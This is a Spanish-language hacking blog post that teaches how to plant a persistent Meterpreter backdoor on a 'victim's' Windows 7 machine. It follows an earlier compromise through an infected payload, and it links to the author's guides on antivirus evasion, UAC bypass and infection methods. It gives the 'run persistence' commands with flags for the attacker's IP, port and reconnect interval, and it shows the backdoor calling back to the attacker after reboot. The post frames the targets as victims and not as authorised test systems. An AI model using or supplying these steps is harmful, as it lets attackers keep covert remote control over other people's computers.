Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.
¿Que es Backdoor?
Se le domina como puerta trasera que se ejecuta mediante un "Script" remoto a la maquina de la victima con conexión puente al ordenador del atacante, dejando el sistema siempre en escucha.
El Backdoor persistente es compatible con todas las versiones de Windows.
Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":
http://www.backtrackomar.com/2014/01/aprendiendo-metasploit-avanzado.html
http://www.backtrackomar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrackomar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrackomar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrackomar.com/2016/02/dump-skype-account-our-victim-for.html
http://www.backtrackomar.com/2016/02/bypassear-privilegios-uac-win-10-8-81.html
http://www.backtrackomar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrackomar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrackomar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrackomar.com/2016/02/send-video-youtube-victim-with.html
http://www.backtrackomar.com/2016/02/compilando-nuestros-payloads-in.html
Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1
Entonces lo que haremos sera ejecutar el comando persistente por default.
meterpreter > run persistence
voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:
El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.
Como vemos el archivo se subió correctamente en la carpeta por default.
Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.
Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.
Como podemos observar automáticamente hemos tenido la conexión meterpreter.
ahora viene la pregunta de muchos:
¿si yo deseo establecer una IP y puerto diferente?
Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:
run persistence -U -i 5 -p 4444 -r 192.168.1.35
-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i >> segundos de conexión para establecer.
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.
Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:
Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.
de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.
Saludos!
0 comentarios:
Publicar un comentario